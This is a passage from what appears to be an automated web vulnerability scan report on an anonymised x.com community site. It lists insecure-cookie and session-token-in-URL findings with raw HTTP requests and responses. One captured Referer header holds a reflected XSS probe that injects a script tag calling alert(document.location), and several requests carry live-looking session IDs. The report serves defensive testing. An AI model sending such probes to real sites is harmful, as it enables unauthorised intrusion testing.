Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133363236393b332c3133373331333b332c3132393239303b332c3133393730313b332c3133313833303b332c3133373135383b332c3132323335343b332c3133343430323b332c39313330313b332c3134303635343b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=78479 t=1313157133485041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.206. https://www.x.com/people/gem  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gem

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:53 GMT; Path=/
Vary: User-Agent
JP: D=130479 t=1313157173386719
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.207. https://www.x.com/people/gogoeric  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/gogoeric

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/gogoeric HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b; Expires=Sun, 11-Sep-2011 13:51:59 GMT; Path=/
Vary: User-Agent
JP: D=166431 t=1313157119718400
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.208. https://www.x.com/people/hotellina  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/hotellina

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/hotellina HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=239357 t=1313157149186681
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.209. https://www.x.com/people/iConcessionStand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/iConcessionStand

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/iConcessionStand HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:00 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b; Expires=Sun, 11-Sep-2011 13:52:01 GMT; Path=/
Vary: User-Agent
JP: D=158386 t=1313157121449840
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.210. https://www.x.com/people/joncas  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/joncas

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/joncas HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:45 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:46 GMT; Path=/
Vary: User-Agent
JP: D=77890 t=1313157166303738
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.211. https://www.x.com/people/lwhite2104  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/lwhite2104

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/lwhite2104 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:51 GMT; Path=/
Vary: User-Agent
JP: D=79758 t=1313157171575959
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.212. https://www.x.com/people/mandeheritage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/mandeheritage

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/mandeheritage HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3133393730313b332c3133343430323b332c3134303635343b332c39313330313b332c3132323335343b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=79098 t=1313157131216875
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.213. https://www.x.com/people/odeskdev  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/odeskdev

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/odeskdev HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b332c35333735313b332c35373137393b332c3133363935343b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:51:56 GMT; Path=/
Vary: User-Agent
JP: D=77481 t=1313157116029628
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.214. https://www.x.com/people/omuleanu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/omuleanu

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/omuleanu HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:42 GMT; Path=/
Vary: User-Agent
JP: D=161006 t=1313157162705096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.215. https://www.x.com/people/pluto26  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/pluto26

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/pluto26 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:40 GMT; Path=/
Vary: User-Agent
JP: D=76607 t=1313157160904760
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.216. https://www.x.com/people/posiden5665  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/posiden5665

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/posiden5665 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3134303635343b332c3133343430323b332c34383739343b332c39313330313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=81038 t=1313157130321120
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.217. https://www.x.com/people/ramonmorales123  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/ramonmorales123

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/ramonmorales123 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c3132323335343b332c3133343430323b332c34383739343b332c3134303635343b332c39313330313b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=87382 t=1313157130920019
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.218. https://www.x.com/people/rizkygarut  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/rizkygarut

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/rizkygarut HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c3133363935343b332c35333735313b332c3133383538323b332c36303039313b332c3133373131353b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78953 t=1313157110910504
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.219. https://www.x.com/people/roguereptile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/roguereptile

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/roguereptile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c39313330313b332c3134303635343b332c34383739343b332c31303737303b332c31393037313b332c33353136303b332c35333639373b332c38383732373b332c39343632373b332c38303434333b; Expires=Sun, 11-Sep-2011 13:52:10 GMT; Path=/
Vary: User-Agent
JP: D=134822 t=1313157130043079
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.220. https://www.x.com/people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/s.ng.oldiebro186/blog/2011/08/10/attitude-determines-everything HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:32 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b332c3131303734313b332c3131313737343b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:33 GMT; Path=/
Vary: User-Agent
JP: D=72931 t=1313157153516546
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.221. https://www.x.com/people/sebastian.kopp@wooga.com  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/sebastian.kopp@wooga.com

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/sebastian.kopp@wooga.com HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c38383732373b332c39343632373b332c38303434333b332c36363938333b332c37383635393b332c35353331393b332c38393433393b332c35333436333b332c323030383b332c35333437343b; Expires=Sun, 11-Sep-2011 13:52:03 GMT; Path=/
Vary: User-Agent
JP: D=79810 t=1313157123276448
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.222. https://www.x.com/people/skier  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/skier

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/skier HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:13 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c31323739393b332c3133313833303b332c3133363236393b332c3132393239303b332c3133373135383b332c3133373331333b332c3133393730313b332c3132323335343b332c3133343430323b332c39313330313b; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=93161 t=1313157133808445
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

3. Session token in URL  previous  next
There are 56 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


3.1. https://www.x.com/images/transparent.png  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /images/transparent.png

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /images/transparent.png;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:19 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 07 Aug 2011 10:40:21 GMT
Cache-Control: max-age=60
Content-Type: image/png
Vary: Accept-Encoding,User-Agent
JP: D=703 t=1313157139457601
Content-Length: 100
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive

.PNG
.
...IHDR.............(.4.....PLTE.......g......tRNS.@..f....IDATx.b`..0.....OmY.....IEND.B`.

3.2. https://www.x.com/index.jspa  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /index.jspa

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /index.jspa HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help
Cookie: JSESSIONID=2AE31D5B697BAD75797FFFBF88CC8F17.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e27151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 01:59:24 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
JP: D=81298 t=1313114364510678
Cache-Control: no-cache, private
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Length: 33122

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
</a> or <a href="https://www.x.com/login.jspa;jsessionid=C5B183263B3F02ED7C066088CE4D527D.node0?flowType=Signup">Register</a>
...[SNIP]...

3.3. https://www.x.com/login.jspa  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /login.jspa

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /login.jspa;jsessionid=C5B183263B3F02ED7C066088CE4D527D.node0?flowType=Signup HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
